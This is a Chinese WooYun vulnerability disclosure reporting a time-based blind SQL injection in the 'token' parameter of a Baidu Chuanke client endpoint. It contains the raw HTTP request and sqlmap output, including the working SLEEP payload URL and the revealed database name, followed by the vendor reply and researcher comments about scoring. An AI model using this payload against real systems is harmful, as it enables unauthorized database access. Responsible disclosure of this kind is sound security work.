百度传课某处存在SQL注入

2017年4月29日07:50:55评论373 views字数 211阅读0分42秒阅读模式

摘要

2016-04-13：细节已通知厂商并且等待厂商处理中
2016-04-13：厂商已经确认，细节仅向厂商公开
2016-04-23：细节向核心白帽子及相关领域专家公开
2016-05-03：细节向普通白帽子公开
2016-05-13：细节向实习白帽子公开
2016-05-28：细节向公众公开

漏洞概要关注数(11) 关注此漏洞

缺陷编号： WooYun-2016-195952

漏洞标题：百度传课某处存在SQL注入

漏洞作者： null_z

提交时间： 2016-04-13 21:04

公开时间： 2016-05-28 21:40

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： php+字符类型注射 Mysql

3人收藏

漏洞详情

披露状态：

简要描述：

。。。

详细说明：

注入点

注入参数 token

code 区域

GET /?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b*&clientType=1&mod=user&act=pushIOS HTTP/1.1
 Host: pop.client.chuanke.com
 Accept-Language: zh-cn
 Connection: keep-alive
 Accept: */*
 User-Agent: ChuanKeIPhone/2.8.6 CFNetwork/672.1.14 Darwin/14.0.0
 Host: pop.client.chuanke.com
 Pragma: no-cache
 Content-Type: text/html
 DontTrackMeHere: gzip, deflate

漏洞证明：

code 区域

sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
 ---
 Parameter: #1* (URI)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: http://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS
 ---
 web application technology: PHP 5.3.13
 back-end DBMS: MySQL 5.0.12
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: #1* (URI)
     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: http://pop.client.chuanke.com:80/?token=796fdf78e4f652b731a7551ae52be1b303c4d193224de560eef171e70147603b' AND (SELECT * FROM (SELECT(SLEEP(5)))iUbS) AND 'ngyI'='ngyI&clientType=1&mod=user&act=pushIOS
 ---
 web application technology: PHP 5.3.13
 back-end DBMS: MySQL >= 5.0.0
 current database:    'kk_portal'

修复方案：

。。。

版权声明：转载请注明来源 null_z@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2016-04-13 21:38

厂商回复：

已知悉，此漏洞正在修复，感谢对百安全的关注。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-13 21:42 | null_z ( 普通白帽子 | Rank:1012 漏洞数:115 )

1

请问，是从哪儿悉知的？这样以后发现你们的洞是不是都不用发了

1# 回复此人
2016-04-13 22:25 | onpu ( 普通白帽子 | Rank:396 漏洞数:67 )

1

1分，还不如忽略!

2# 回复此人
2016-04-14 07:54 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

1

@null_z 挺正常的，上周三个注入，给了src，度方响应极快，除一个通过外其余全部胎死，胎死的一个由于手上有证据撕B后给了礼节分，另一个没来得及搜集证据，已灰飞烟灭

3# 回复此人
2016-04-14 19:27 | zowie ( 实习白帽子 | Rank:84 漏洞数:16 | Z先生)

1

@hear7v 大神求带哈哈

4# 回复此人
2016-04-15 13:08 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

1

@zowie 不会吧，你真是Z先生？

5# 回复此人
2016-04-23 13:41 | js2012 ( 普通白帽子 | Rank:126 漏洞数:44 | 闭关修炼。。。)

0

不是该提交给传课吗？

6# 回复此人
2016-04-23 13:52 | null_z ( 普通白帽子 | Rank:1012 漏洞数:115 )

0

@js2012 传课网是不是小厂商了？论标题的重要性。哈哈

7# 回复此人
2016-04-23 14:04 | js2012 ( 普通白帽子 | Rank:126 漏洞数:44 | 闭关修炼。。。)

0

我交了传课的两个洞，都是写的百度审核大大给我改成了传课。。。。 @null_z

8# 回复此人

漏洞概要 关注数(11) 关注此漏洞